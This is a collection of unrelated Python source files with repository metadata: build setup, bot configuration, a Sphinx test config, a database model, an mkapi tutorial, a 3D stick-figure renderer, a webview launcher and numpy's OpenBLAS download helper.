"pandas",
"pytz",
"pyyaml",
"python-binance==0.7.5",
"sqlalchemy",
"ujson",
"yarl",
]
cython_kwargs = {
"language": "c++",
"language_level": 3,
}
if is_posix:
cython_kwargs["nthreads"] = cpu_count
if "DEV_MODE" in os.environ:
version += ".dev1"
package_data[""] = [
"*.pxd", "*.pyx", "*.h"
]
package_data["hummingbot"].append("core/cpp/*.cpp")
if len(sys.argv) > 1 and sys.argv[1] == "build_ext" and is_posix:
sys.argv.append(f"--parallel={cpu_count}")
setup(name="hummingbot",
version=version,
description="Hummingbot",
url="https://github.com/CoinAlpha/hummingbot",
author="CoinAlpha, Inc.",
author_email="[email protected]",
license="Apache 2.0",
packages=packages,
package_data=package_data,
install_requires=install_requires,
ext_modules=cythonize(["hummingbot/**/*.pyx"], **cython_kwargs),
include_dirs=[
np.get_include()
],
scripts=[
"bin/hummingbot.py",
"bin/hummingbot_quickstart.py"
],
)
if __name__ == "__main__":
main()
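# Hedged usage note (not part of the original setup.py): the script is driven
# through standard setuptools/pip entry points, e.g.:
#   python setup.py build_ext --inplace   # compile the Cython extensions
#   pip install -e .                      # editable install
# Both commands are generic setuptools/pip invocations, not project-specific.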
| 28.321212 | 74 | 0.563022 |
4a2104f5595c52a9384ed841f9422661c461e9ac | 1,357 | py | Python | bot/env.py | JNDevs/HariBot | 981771f98a497e49771d2fdef8ede289a96a63af | ["MIT"] | null | null | null | bot/env.py | JNDevs/HariBot | 981771f98a497e49771d2fdef8ede289a96a63af | ["MIT"] | null | null | null | bot/env.py | JNDevs/HariBot | 981771f98a497e49771d2fdef8ede289a96a63af | ["MIT"] | 1 | 2021-08-12T12:15:40.000Z | 2021-08-12T12:15:40.000Z |
"""This module parses environment variables."""
# pylint: disable=R0903, E0611
from typing import Optional
from pydantic import BaseSettings, HttpUrl
from .core.helpers.config import DatabaseConfig, LavalinkConfig
__all__ = ("bot_config", "db_config", "lavalink_config")
class BotConfig(BaseSettings):
"""
Parses Bot config with environment variables
"""
prefix: str
token: str
webhook_url: HttpUrl
dev_env = False
private_bot: Optional[bool]
load_jishaku: Optional[bool]
class Config:
"""This is the config class containg info about env prefix and file"""
env_file = ".env"
env_prefix = "bot_"
class BotDatabaseConfig(BaseSettings, DatabaseConfig):
"""
Parses BoilerBot Database config with environment variables
"""
class Config:
"""This is the config class containg info about env prefix and file"""
env_file = ".env"
env_prefix = "postgres_"
class BotLavalinkConfig(BaseSettings, LavalinkConfig):
"""
    Parses BoilerBot Lavalink config with environment variables
"""
class Config:
"""This is the config class containg info about env prefix and file"""
env_file = ".env"
env_prefix = "lavalink_"
bot_config = BotConfig()
db_config = BotDatabaseConfig()
lavalink_config = BotLavalinkConfig()
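# Hedged example (not part of the original module) of a .env file these
# settings classes would read; every value is made up, and the postgres_/
# lavalink_ fields live on the imported DatabaseConfig/LavalinkConfig mixins:
#   bot_prefix=!
#   bot_token=<discord-bot-token>
#   bot_webhook_url=https://example.com/webhook
#   bot_dev_env=true
#   postgres_host=localhost   # illustrative; actual field names not shown here
#   lavalink_host=localhost   # illustrative; actual field names not shown here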
| 22.245902 | 78 | 0.686809 |
4a21054ed8398a6e2ba5e1c03b0d64ec470ff2a3 | 291 | py | Python | tests/roots/test-templating/conf.py | zhsj/sphinx | 169297d0b76bf0b503033dadeb14f9a2b735e422 | ["BSD-2-Clause"] | 3 | 2019-06-11T09:42:08.000Z | 2020-03-10T15:57:09.000Z | tests/roots/test-templating/conf.py | zhsj/sphinx | 169297d0b76bf0b503033dadeb14f9a2b735e422 | ["BSD-2-Clause"] | 12 | 2019-01-09T15:43:57.000Z | 2020-01-21T10:46:30.000Z | tests/roots/test-templating/conf.py | zhsj/sphinx | 169297d0b76bf0b503033dadeb14f9a2b735e422 | ["BSD-2-Clause"] | 10 | 2019-02-04T11:49:35.000Z | 2020-03-21T13:32:20.000Z |
# -*- coding: utf-8 -*-
project = 'Sphinx templating <Tests>'
source_suffix = '.txt'
keep_warnings = True
templates_path = ['_templates']
release = version = '2013.120'
exclude_patterns = ['_build']
extensions = ['sphinx.ext.autosummary']
autosummary_generate = ['autosummary_templating']
| 24.25 | 49 | 0.721649 |
4a2105b4dab85b4fa2676e3d11ce354fe0ef09fc | 692 | py | Python | src/backend/app/db/models/event.py | douglasdaly/dougliz-wedding | da673baf3a7387c3818960c0ffa12ab7c830a89b | ["MIT"] | 5 | 2020-02-02T02:39:23.000Z | 2021-08-17T15:50:57.000Z | src/backend/app/db/models/event.py | douglasdaly/dougliz-wedding | da673baf3a7387c3818960c0ffa12ab7c830a89b | ["MIT"] | 4 | 2021-03-31T19:39:57.000Z | 2022-01-22T09:29:10.000Z | src/backend/app/db/models/event.py | douglasdaly/dougliz-wedding | da673baf3a7387c3818960c0ffa12ab7c830a89b | ["MIT"] | 1 | 2020-04-12T17:11:43.000Z | 2020-04-12T17:11:43.000Z |
# -*- coding: utf-8 -*-
"""
Event database storage model.
"""
import uuid
import sqlalchemy as sa
from sqlalchemy.orm import relationship
from app.db.base_class import Base
from app.db.types import GUID
class Event(Base):
"""
Database storage for Event objects.
"""
id = sa.Column(sa.Integer, primary_key=True)
uid = sa.Column(GUID, unique=True, index=True, default=uuid.uuid4)
name = sa.Column(sa.String, nullable=False, index=True)
date = sa.Column(sa.Date, nullable=False, index=True)
start = sa.Column(sa.Time)
end = sa.Column(sa.Time)
address_id = sa.Column(sa.Integer, sa.ForeignKey('addresses.id'))
address = relationship("Address")
| 23.862069 | 70 | 0.687861 |
4a2107bab26885af4773e5df8ab4534b431c7289 | 277 | py | Python | trinity/sync/common/constants.py | dendisuhubdy/trinity | 001664781259c7dd0779a0ef6f822451b608ded4 | ["MIT"] | 3 | 2019-06-17T13:59:20.000Z | 2021-05-02T22:09:13.000Z | trinity/sync/common/constants.py | dendisuhubdy/trinity | 001664781259c7dd0779a0ef6f822451b608ded4 | ["MIT"] | 2 | 2019-04-30T06:22:12.000Z | 2019-06-14T04:27:18.000Z | trinity/sync/common/constants.py | dendisuhubdy/trinity | 001664781259c7dd0779a0ef6f822451b608ded4 | ["MIT"] | 2 | 2019-09-05T01:31:56.000Z | 2019-09-17T09:09:16.000Z |
# If a peer returns 0 results, wait this many seconds before asking it for anything else
EMPTY_PEER_RESPONSE_PENALTY = 15.0
# Picked a reorg number that is covered by a single skeleton header request,
# which covers about 6 days at 15s blocks
MAX_SKELETON_REORG_DEPTH = 35000
| 39.571429 | 88 | 0.801444 |
4a2107d24b5a0f7eb792a89caa8ac94245cc63dc | 176 | py | Python | test/vtgate_gateway_flavor/__init__.py | bowlofstew/vitess | 659c6c0582cdb4f5d3defcd3dbfc1a5f839cabc8 | ["BSD-3-Clause"] | 1 | 2017-06-29T04:57:43.000Z | 2017-06-29T04:57:43.000Z | test/vtgate_gateway_flavor/__init__.py | AndyDiamondstein/vitess | 295c300cd22c109f8be7a454c03c96c6b8e3b55c | ["BSD-3-Clause"] | null | null | null | test/vtgate_gateway_flavor/__init__.py | AndyDiamondstein/vitess | 295c300cd22c109f8be7a454c03c96c6b8e3b55c | ["BSD-3-Clause"] | 3 | 2017-04-03T21:07:17.000Z | 2020-03-04T04:59:05.000Z |
#!/usr/bin/env python
# Copyright 2015, Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can
# be found in the LICENSE file.
| 29.333333 | 69 | 0.744318 |
4a21096da7e160970f2eb66ddd4934be924a9e12 | 2,335 | py | Python | app/model.py | schuderer/mllaunchpad-template | 2fa0b39c8c6e879e3ebc57fa863d50e4f3262d2b | ["MIT"] | 2 | 2020-03-03T23:18:19.000Z | 2020-03-04T21:54:40.000Z | app/model.py | schuderer/mllaunchpad-template | 2fa0b39c8c6e879e3ebc57fa863d50e4f3262d2b | ["MIT"] | 6 | 2020-02-21T13:31:43.000Z | 2020-06-15T14:23:59.000Z | app/model.py | schuderer/mllaunchpad-template | 2fa0b39c8c6e879e3ebc57fa863d50e4f3262d2b | ["MIT"] | null | null | null |
from mllaunchpad import ModelInterface, ModelMakerInterface
from sklearn.metrics import accuracy_score, confusion_matrix
from sklearn import tree
import pandas as pd
import logging
from app.example_import import clean_string
logger = logging.getLogger(__name__)
# Train this example from the command line:
# python -m mllaunchpad -c tree_cfg.yml -t
#
# Start REST API:
# python -m mllaunchpad -c tree_cfg.yml -a
#
# Example API call:
# http://127.0.0.1:5000/iris/v0/varieties?sepal.length=4.9&sepal.width=2.4&petal.length=3.3&petal.width=1
#
# Example with URI Param (Resource ID):
# http://127.0.0.1:5000/iris/v0/varieties/12?hallo=metric
#
# Example to trigger batch prediction (not really the idea of an API...):
# http://127.0.0.1:5000/iris/v0/varieties
class MyExampleModelMaker(ModelMakerInterface):
"""Creates a model
"""
def create_trained_model(self, model_conf, data_sources, data_sinks, old_model=None):
logger.info(clean_string("using our imported module"))
df = data_sources['petals'].get_dataframe()
X = df.drop('variety', axis=1)
y = df['variety']
my_tree = tree.DecisionTreeClassifier()
my_tree.fit(X, y)
return my_tree
def test_trained_model(self, model_conf, data_sources, data_sinks, model):
df = data_sources['petals_test'].get_dataframe()
X_test = df.drop('variety', axis=1)
y_test = df['variety']
my_tree = model
y_predict = my_tree.predict(X_test)
acc = accuracy_score(y_test, y_predict)
conf = confusion_matrix(y_test, y_predict).tolist()
metrics = {'accuracy': acc, 'confusion_matrix': conf}
return metrics
class MyExampleModel(ModelInterface):
"""Uses the created Data Science Model
"""
def predict(self, model_conf, data_sources, data_sinks, model, args_dict):
logger.info(clean_string("using our imported module"))
logger.info('Doing "normal" prediction')
X = pd.DataFrame({
'sepal.length': [args_dict['sepal.length']],
'sepal.width': [args_dict['sepal.width']],
'petal.length': [args_dict['petal.length']],
'petal.width': [args_dict['petal.width']]
})
my_tree = model
y = my_tree.predict(X)[0]
return {'iris_variety': y}
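# Hedged note (not part of the template): the predict() above serves the
# example API call listed near the top of this file and returns JSON like
#   {"iris_variety": "Setosa"}
# where the label string depends on the `variety` values in the training data.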
| 29.556962 | 105 | 0.665953 |
4a2109f2ce56ab419c3eeaeaf540961bedc96658 | 5,424 | py | Python | main.py | KingJellycycle/Neutralino-Deimos | 2871851aabc484f7cabc224aec5415a6423827c3 | ["MIT"] | null | null | null | main.py | KingJellycycle/Neutralino-Deimos | 2871851aabc484f7cabc224aec5415a6423827c3 | ["MIT"] | null | null | null | main.py | KingJellycycle/Neutralino-Deimos | 2871851aabc484f7cabc224aec5415a6423827c3 | ["MIT"] | null | null | null |
import codecs
import webview
import urllib.request
import xml.dom.minidom
import json
import os
from gamemanager import GameManager
_server_address = "http://192.168.0.196/"
_news_address = "https://www.kingjellycycle.com/feed.xml"
class Api():
def __init__(self):
self.window = False
self.mainview = False
self._settings = {
"theme": "dark",
"custom_css": "",
"default_page": "home",
"background_update": "enabled",
"show_desktop_notifications": "enabled",
"storage_dir": "./Deimos_Storage",
"bound_dir": "./Deimos_Storage/bound",
"bound_version": ""
}
self.create_directories()
self.load_settings()
self.gm = GameManager(_server_address, self._settings["bound_dir"])
    def ping_servers(self):
        # [0] = server address, [1] = news address
        servers_active = [False, False]
        try:
            urllib.request.urlopen(_server_address)
            servers_active[0] = True
        except Exception:
            servers_active[0] = False
        try:
            urllib.request.urlopen(_news_address)
            servers_active[1] = True
        except Exception:
            servers_active[1] = False
        return servers_active
    def set_page(self, page):
        # Read the requested page from disk; the context manager ensures the
        # file handle is closed after reading.
        with codecs.open("./src/pages/" + page, "r", "utf-8") as file:
            return file.read()
def get_news(self):
articles = []
fetch = urllib.request.urlopen(_news_address)
data = fetch.read()
fetch.close()
xmlParsed = xml.dom.minidom.parseString(data)
for item in xmlParsed.getElementsByTagName('entry'):
if item.getElementsByTagName('category')[0].getAttribute('term') == "Personal":
continue
#print(item.getElementsByTagName('link')[0].getAttribute('href'))
title = item.getElementsByTagName('title')[0].childNodes[0].data
link = item.getElementsByTagName('link')[0].getAttribute('href')
date = item.getElementsByTagName('published')[0].childNodes[0].data
category = item.getElementsByTagName('category')[0].getAttribute('term')
summary = item.getElementsByTagName('summary')[0].childNodes[0].data
content = item.getElementsByTagName('content')[0].childNodes[0].data
post = {
"title": title,
"link": link,
"date": date,
"category": category,
"summary": summary,
"content": content
}
articles.append(post)
return articles
def get_patches(self):
fetch = urllib.request.urlopen(_server_address+ "bound/patches/latest.json")
data = fetch.read()
fetch.close()
dataParse = json.loads(data)
patches = []
for p in dataParse['prev_versions']:
info = urllib.request.urlopen(_server_address+ "bound/patches/"+p+"/patch.json")
infoData = info.read()
info.close()
infoParse = json.loads(infoData)
notes = ""
for note in infoParse['patch_notes']:
notes += "<div class='note'>"+note+"</div>"
patch = {
"version": p,
"title": infoParse['title'],
"description": infoParse['description'],
"date": infoParse['date'],
"notes": notes
}
patches.append(patch)
return patches
def set_settings(self,settings):
self._settings = settings
def save_settings(self):
        # write settings to file settings.json in directory storage_dir
with open(self._settings["storage_dir"] + "/settings.json", "w") as f:
json.dump(self._settings, f)
def load_settings(self):
        # load settings from file settings.json in directory storage_dir
if os.path.exists(self._settings["storage_dir"] + "/settings.json"):
with open(self._settings["storage_dir"] + "/settings.json", "r") as f:
self._settings = json.load(f)
else:
self.save_settings()
#print(self._settings)
return self._settings
def minimise_app(self):
window.minimize()
def exit_app(self):
self.save_settings()
window.destroy()
def create_directories(self):
if not os.path.exists(self._settings["storage_dir"]):
os.makedirs(self._settings["storage_dir"])
if not os.path.exists(self._settings["bound_dir"]):
os.makedirs(self._settings["bound_dir"])
if not os.path.exists(self._settings["storage_dir"] + "/bound"):
os.makedirs(self._settings["storage_dir"] + "/bound")
if __name__ == '__main__':
api = Api()
window = webview.create_window('Deimos', './src/index.html',js_api=api, width=1024, height=600, \
x=None, y=None, resizable=False, fullscreen=False, \
min_size=(1024, 600), hidden=False, frameless=True, \
minimized=False, on_top=False, confirm_close=False, \
background_color='#111', text_select=False,easy_drag=False)
    # Set the draggable part of the window and start the window
webview.DRAG_REGION_SELECTOR = '#draggable'
webview.start(debug=True) | 32.674699 | 101 | 0.569875 |
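# Hedged note (not part of the original file): pywebview exposes every public
# method of the js_api object to the frontend, so ./src/index.html can call,
# e.g. from JavaScript (render/show are made-up helpers):
#   pywebview.api.get_news().then(articles => render(articles));
#   pywebview.api.set_page('home.html').then(html => show(html));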
4a210a1ea3997ffc2344b7679df9e4582e4d829c | 4,069 | py | Python | docs/usage/library.py | Ahrak/mkapi | fdae77dac6fde1788a323e0e3c76adda8959f31e | [
"MIT"
] | null | null | null | docs/usage/library.py | Ahrak/mkapi | fdae77dac6fde1788a323e0e3c76adda8959f31e | [
"MIT"
] | null | null | null | docs/usage/library.py | Ahrak/mkapi | fdae77dac6fde1788a323e0e3c76adda8959f31e | [
"MIT"
] | null | null | null | """md
# Using MkApi within Python
MkApi is a standalone library as well as a MkDocs plugin, so that you can use it
within Python.
First, import MkApi:
{{ # cache:clear }}
<style type="text/css"> <!-- .mkapi-node { border: 2px dashed #88AA88; } -->
</style>
"""
import mkapi
# ## Node object
# Define a simple class to show how MkApi works.
class A:
"""Class docstring.
Note:
Docstring of `__init__()` is deleted, if there is
a class-level docstring.
"""
def __init__(self):
"""Init docstring."""
self.a: int = 1 #: Integer **attribute**.
def to_str(self, x: int) -> str:
"""Converts `int` to `str`.
Args:
x: Input **value**.
"""
return str(x)
# `mkapi.get_node()` generates a `Node` object that has tree structure.
# -
node = mkapi.get_node(A)
type(node)
# Some attributes:
node.object.kind, node.object.name
# -
docstring = node.docstring
len(docstring.sections) # type:ignore
# -
section = docstring.sections[0] # type:ignore
section.name, section.markdown
# -
section = docstring.sections[1] # type:ignore
section.name, section.markdown
# The `members` attribute gives children, for example, bound methods of a class.
len(node.members)
# -
child = node.members[0]
type(child)
# Elements of `Node.members` are also `Node` objects, so this is a tree structure.
child.object.kind, child.object.name
# -
docstring = child.docstring
len(docstring.sections) # type:ignore
# -
section = docstring.sections[0] # type:ignore
section.name, section.markdown
# -
section = docstring.sections[1] # type:ignore
section.name, section.markdown
# The above Parameters section has an empty `markdown`, while its `items` represents an
# argument list:
item = section.items[0]
print(item)
print(item.type)
print(item.description)
# `Node.get_markdown()` creates a *joint* Markdown of this node.
markdown = node.get_markdown()
print(markdown)
# Where is Note or Parameters section heading, *etc.*? No problem. The
# `Node.get_markdown()` divides docstrings into two parts. One is a plain Markdown that
# will be converted into HTML by any Markdown converter, for example, MkDocs. The other
# is the outline structure of docstrings such as sections or arguments that will be
# processed by MkApi itself.
# ## Converting Markdown
# For simplicity, we use [Python-Markdown](https://python-markdown.github.io/) library
# instead of MkDocs.
from markdown import Markdown # isort:skip
converter = Markdown()
html = converter.convert(markdown)
print(html)
# ## Distributing HTML
# `Node.set_html()` distributes HTML into docstring and members.
node.set_html(html)
# Take a look at what happened.
section = node.docstring.sections[0] # type:ignore
section.markdown, section.html
# -
child = node.members[0]
section = child.docstring.sections[0] # type:ignore
section.markdown, section.html
# -
section = child.docstring.sections[1] # type:ignore
item = section.items[0]
item.description.markdown, item.description.html # A <p> tag is deleted.
# ## Constructing HTML
# Finally, construct HTML calling `Node.get_html()` that internally uses
# [Jinja](https://jinja.palletsprojects.com/en/2.11.x/) library.
html = node.get_html()
print(html[:300].strip())
# [Jupyter](https://jupyter.org/) allows us to see the rendered HTML.
from IPython.display import HTML # isort:skip
HTML(html)
# ## Summary
# All you need to get the documentation of an object is described by the following
# function.
from markdown import Markdown # isort:skip
import mkapi # isort:skip
def get_html(obj) -> str:
# Construct a node tree structure.
node = mkapi.get_node(obj)
# Create a joint Markdown from components of the node.
markdown = node.get_markdown()
# Convert it into HTML by any external converter.
converter = Markdown()
html = converter.convert(markdown)
# Split and distribute the HTML into original components.
node.set_html(html)
# Render the node to create final HTML.
return node.get_html()
| 23.119318 | 87 | 0.702138 |
4a210b9e53e4a1f2fe704ae10bbb4892f4dda987 | 2,352 | py | Python | code/renderstick.py | cflamant/3d-pose-reconstruction | 8847a1eba88fe216b72ad74a21707e8d877bc63c | [
"MIT"
] | 5 | 2019-07-20T13:26:20.000Z | 2021-01-30T12:53:05.000Z | code/renderstick.py | cflamant/3d-pose-reconstruction | 8847a1eba88fe216b72ad74a21707e8d877bc63c | [
"MIT"
] | null | null | null | code/renderstick.py | cflamant/3d-pose-reconstruction | 8847a1eba88fe216b72ad74a21707e8d877bc63c | [
"MIT"
] | 1 | 2021-01-30T12:53:08.000Z | 2021-01-30T12:53:08.000Z | #!/usr/bin/env python
#Author: Cedric Flamant
import numpy as np
import vpython as vp
#import matplotlib.pyplot as plt
#from mpl_toolkits.mplot3d import Axes3D
import angletopos
def tovec(arr):
"""Converts numpy 3-vector into vp.vector
Input =>
arr: 3 element numpy array
Returns =>
vec: vpython vector
"""
return vp.vec(arr[0],arr[1],arr[2])
def renderstick(positions):
'''Draws the stick figure in 3D
Input
positions: 2d array of joint positions.
'''
vp.scene.caption = """Right button drag or Ctrl-drag to rotate "camera" to view scene.
To zoom, drag with middle button or Alt/Option depressed, or use scroll wheel.
On a two-button mouse, middle is left + right.
Shift-drag to pan left/right and up/down.
Touch screen: pinch/extend to zoom, swipe or two-finger rotate."""
vp.scene.width = 800
vp.scene.height = 600
avpos = np.average(positions,axis=0)
pos = positions - np.tile(avpos,(15,1))
rarm = vp.curve(pos=[tovec(pos[3,:]),tovec(pos[7,:]),tovec(pos[11,:])],radius=1)
shoulders = vp.curve(pos=[tovec(pos[3,:]),tovec(pos[4,:])],radius=1)
larm = vp.curve(pos=[tovec(pos[4,:]),tovec(pos[8,:]),tovec(pos[12,:])],radius=1)
spine = vp.curve(pos=[tovec(pos[0,:]),tovec(pos[2,:])],radius=1)
hips = vp.curve(pos=[tovec(pos[5,:]),tovec(pos[6,:])],radius=1)
rleg = vp.curve(pos=[tovec(pos[5,:]),tovec(pos[9,:]),tovec(pos[13,:])],radius=1)
lleg = vp.curve(pos=[tovec(pos[6,:]),tovec(pos[10,:]),tovec(pos[14,:])],radius=1)
head = vp.sphere(pos=tovec(pos[0,:]), radius=3.)
rshoulder = vp.sphere(pos=tovec(pos[3,:]), radius=2., color=vp.color.orange)
lshoulder = vp.sphere(pos=tovec(pos[4,:]), radius=2., color=vp.color.orange)
rhip = vp.sphere(pos=tovec(pos[5,:]), radius=2., color=vp.color.orange)
lhip = vp.sphere(pos=tovec(pos[6,:]), radius=2., color=vp.color.orange)
relbow = vp.sphere(pos=tovec(pos[7,:]), radius=2., color=vp.color.orange)
lelbow = vp.sphere(pos=tovec(pos[8,:]), radius=2., color=vp.color.orange)
rknee = vp.sphere(pos=tovec(pos[9,:]), radius=2., color=vp.color.orange)
lknee = vp.sphere(pos=tovec(pos[10,:]), radius=2., color=vp.color.orange)
if __name__=="__main__":
angles = np.zeros((11,2))
pos = angletopos.ang2pos(np.zeros(3),angles)
renderstick(pos)
| 39.864407 | 90 | 0.642432 |
4a210cfe1c718631e6cbaa860e979862e99efa60 | 10,567 | py | Python | tools/openblas_support.py | rushabh-v/numpy | f30b2564d3923b2c307a026e4a22d20bc19872f0 | [
"BSD-3-Clause"
] | 2 | 2020-02-28T09:28:20.000Z | 2020-10-12T07:11:28.000Z | tools/openblas_support.py | rushabh-v/numpy | f30b2564d3923b2c307a026e4a22d20bc19872f0 | [
"BSD-3-Clause"
] | null | null | null | tools/openblas_support.py | rushabh-v/numpy | f30b2564d3923b2c307a026e4a22d20bc19872f0 | [
"BSD-3-Clause"
] | null | null | null | from __future__ import division, absolute_import, print_function
import os
import sys
import glob
import shutil
import textwrap
import platform
try:
from urllib.request import urlopen
from urllib.error import HTTPError
except:
#Python2
from urllib2 import urlopen, HTTPError
from tempfile import mkstemp, gettempdir
import zipfile
import tarfile
OPENBLAS_V = 'v0.3.7'
OPENBLAS_LONG = 'v0.3.7'
BASE_LOC = ''
RACKSPACE = 'https://3f23b170c54c2533c070-1c8a9b3114517dc5fe17b7c3f8c63a43.ssl.cf2.rackcdn.com'
ARCHITECTURES = ['', 'windows', 'darwin', 'arm', 'x86', 'ppc64']
IS_32BIT = sys.maxsize < 2**32
def get_arch():
if platform.system() == 'Windows':
ret = 'windows'
elif platform.system() == 'Darwin':
ret = 'darwin'
# Python3 returns a named tuple, but Python2 does not, so we are stuck
elif 'arm' in os.uname()[-1]:
ret = 'arm';
elif 'aarch64' in os.uname()[-1]:
ret = 'arm';
elif 'x86' in os.uname()[-1]:
ret = 'x86'
elif 'ppc64' in os.uname()[-1]:
ret = 'ppc64'
else:
ret = ''
assert ret in ARCHITECTURES
return ret
def get_ilp64():
if os.environ.get("NPY_USE_BLAS_ILP64", "0") == "0":
return None
if IS_32BIT:
raise RuntimeError("NPY_USE_BLAS_ILP64 set on 32-bit arch")
return "64_"
def download_openblas(target, arch, ilp64):
fnsuffix = {None: "", "64_": "64_"}[ilp64]
filename = ''
if arch == 'arm':
# ARMv8 OpenBLAS built using script available here:
# https://github.com/tylerjereddy/openblas-static-gcc/tree/master/ARMv8
# build done on GCC compile farm machine named gcc115
# tarball uploaded manually to an unshared Dropbox location
filename = ('https://www.dropbox.com/s/vdeckao4omss187/'
'openblas{}-{}-armv8.tar.gz?dl=1'.format(fnsuffix, OPENBLAS_V))
typ = 'tar.gz'
elif arch == 'ppc64':
# build script for POWER8 OpenBLAS available here:
# https://github.com/tylerjereddy/openblas-static-gcc/blob/master/power8
# built on GCC compile farm machine named gcc112
# manually uploaded tarball to an unshared Dropbox location
filename = ('https://www.dropbox.com/s/yt0d2j86x1j8nh1/'
'openblas{}-{}-ppc64le-power8.tar.gz?dl=1'.format(fnsuffix, OPENBLAS_V))
typ = 'tar.gz'
elif arch == 'darwin':
filename = '{0}/openblas{1}-{2}-macosx_10_9_x86_64-gf_1becaaa.tar.gz'.format(
RACKSPACE, fnsuffix, OPENBLAS_LONG)
typ = 'tar.gz'
elif arch == 'windows':
if IS_32BIT:
suffix = 'win32-gcc_7_1_0.zip'
else:
suffix = 'win_amd64-gcc_7_1_0.zip'
filename = '{0}/openblas{1}-{2}-{3}'.format(RACKSPACE, fnsuffix, OPENBLAS_LONG, suffix)
typ = 'zip'
elif arch == 'x86':
if IS_32BIT:
suffix = 'manylinux1_i686.tar.gz'
else:
suffix = 'manylinux1_x86_64.tar.gz'
filename = '{0}/openblas{1}-{2}-{3}'.format(RACKSPACE, fnsuffix, OPENBLAS_LONG, suffix)
typ = 'tar.gz'
if not filename:
return None
print("Downloading:", filename, file=sys.stderr)
try:
with open(target, 'wb') as fid:
fid.write(urlopen(filename).read())
except HTTPError:
print('Could not download "%s"' % filename)
return None
return typ
def setup_openblas(arch=get_arch(), ilp64=get_ilp64()):
'''
    Download and set up an OpenBLAS library for building. If successful,
the configuration script will find it automatically.
Returns
-------
msg : str
path to extracted files on success, otherwise indicates what went wrong
To determine success, do ``os.path.exists(msg)``
'''
_, tmp = mkstemp()
if not arch:
raise ValueError('unknown architecture')
typ = download_openblas(tmp, arch, ilp64)
if not typ:
return ''
if arch == 'windows':
if not typ == 'zip':
return 'expecting to download zipfile on windows, not %s' % str(typ)
return unpack_windows_zip(tmp)
else:
if not typ == 'tar.gz':
return 'expecting to download tar.gz, not %s' % str(typ)
return unpack_targz(tmp)
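# --- Editor's illustration (not part of the original script) ---
# A minimal sketch of driving setup_openblas() programmatically; per the
# docstring above, success is signalled by a return value that is an
# existing path.
def _example_setup_openblas():  # hypothetical helper, never called here
    dest = setup_openblas()
    if os.path.exists(dest):
        print('OpenBLAS unpacked under %s' % dest)
    else:
        print('setup failed: %s' % dest)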
def unpack_windows_zip(fname):
import sysconfig
with zipfile.ZipFile(fname, 'r') as zf:
# Get the openblas.a file, but not openblas.dll.a nor openblas.dev.a
lib = [x for x in zf.namelist() if OPENBLAS_LONG in x and
x.endswith('a') and not x.endswith('dll.a') and
not x.endswith('dev.a')]
if not lib:
return 'could not find libopenblas_%s*.a ' \
'in downloaded zipfile' % OPENBLAS_LONG
target = os.path.join(gettempdir(), 'openblas.a')
with open(target, 'wb') as fid:
fid.write(zf.read(lib[0]))
return target
def unpack_targz(fname):
target = os.path.join(gettempdir(), 'openblas')
if not os.path.exists(target):
os.mkdir(target)
with tarfile.open(fname, 'r') as zf:
# Strip common prefix from paths when unpacking
prefix = os.path.commonpath(zf.getnames())
extract_tarfile_to(zf, target, prefix)
return target
def extract_tarfile_to(tarfileobj, target_path, archive_path):
"""Extract TarFile contents under archive_path/ to target_path/"""
target_path = os.path.abspath(target_path)
def get_members():
for member in tarfileobj.getmembers():
if archive_path:
norm_path = os.path.normpath(member.name)
if norm_path.startswith(archive_path + os.path.sep):
member.name = norm_path[len(archive_path)+1:]
else:
continue
dst_path = os.path.abspath(os.path.join(target_path, member.name))
if os.path.commonpath([target_path, dst_path]) != target_path:
# Path not under target_path, probably contains ../
continue
yield member
tarfileobj.extractall(target_path, members=get_members())
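# Editor's note (not part of the original script): with, e.g.,
# archive_path='OpenBLAS-0.3.7', a member named 'OpenBLAS-0.3.7/lib/libopenblas.a'
# is rewritten to '<target_path>/lib/libopenblas.a'; members outside that prefix,
# or paths that would escape target_path via '..', are silently skipped.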
def make_init(dirname):
'''
Create a _distributor_init.py file for OpenBlas
'''
with open(os.path.join(dirname, '_distributor_init.py'), 'wt') as fid:
fid.write(textwrap.dedent("""
'''
Helper to preload windows dlls to prevent dll not found errors.
Once a DLL is preloaded, its namespace is made available to any
subsequent DLL. This file originated in the numpy-wheels repo,
and is created as part of the scripts that build the wheel.
'''
import os
from ctypes import WinDLL
import glob
if os.name == 'nt':
# convention for storing / loading the DLL from
# numpy/.libs/, if present
try:
basedir = os.path.dirname(__file__)
except:
pass
else:
libs_dir = os.path.abspath(os.path.join(basedir, '.libs'))
DLL_filenames = []
if os.path.isdir(libs_dir):
for filename in glob.glob(os.path.join(libs_dir,
'*openblas*dll')):
# NOTE: would it change behavior to load ALL
# DLLs at this path vs. the name restriction?
WinDLL(os.path.abspath(filename))
DLL_filenames.append(filename)
if len(DLL_filenames) > 1:
import warnings
warnings.warn("loaded more than 1 DLL from .libs:\\n%s" %
"\\n".join(DLL_filenames),
stacklevel=1)
"""))
def test_setup(arches):
'''
Make sure all the downloadable files exist and can be opened
'''
def items():
for arch in arches:
yield arch, None
if arch in ('x86', 'darwin', 'windows'):
yield arch, '64_'
for arch, ilp64 in items():
if arch == '':
continue
target = None
try:
try:
target = setup_openblas(arch, ilp64)
except:
print('Could not setup %s' % arch)
raise
if not target:
raise RuntimeError('Could not setup %s' % arch)
print(target)
if arch == 'windows':
if not target.endswith('.a'):
raise RuntimeError("Not .a extracted!")
else:
files = glob.glob(os.path.join(target, "lib", "*.a"))
if not files:
raise RuntimeError("No lib/*.a unpacked!")
finally:
if target is not None:
if os.path.isfile(target):
os.unlink(target)
else:
shutil.rmtree(target)
def test_version(expected_version, ilp64=get_ilp64()):
"""
Assert that expected OpenBLAS version is
actually available via NumPy
"""
import numpy
import ctypes
dll = ctypes.CDLL(numpy.core._multiarray_umath.__file__)
if ilp64 == "64_":
get_config = dll.openblas_get_config64_
else:
get_config = dll.openblas_get_config
get_config.restype=ctypes.c_char_p
res = get_config()
print('OpenBLAS get_config returned', str(res))
check_str = b'OpenBLAS %s' % expected_version[0].encode()
assert check_str in res
if ilp64:
assert b"USE64BITINT" in res
else:
assert b"USE64BITINT" not in res
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(
description='Download and expand an OpenBLAS archive for this ' \
'architecture')
parser.add_argument('--test', nargs='*', default=None,
help='Test different architectures. "all", or any of %s' % ARCHITECTURES)
parser.add_argument('--check_version', nargs=1, default=None,
help='Check provided OpenBLAS version string against available OpenBLAS')
args = parser.parse_args()
if args.check_version is not None:
test_version(args.check_version)
elif args.test is None:
print(setup_openblas())
else:
if len(args.test) == 0 or 'all' in args.test:
test_setup(ARCHITECTURES)
else:
test_setup(args.test)
| 36.064846 | 95 | 0.578972 |
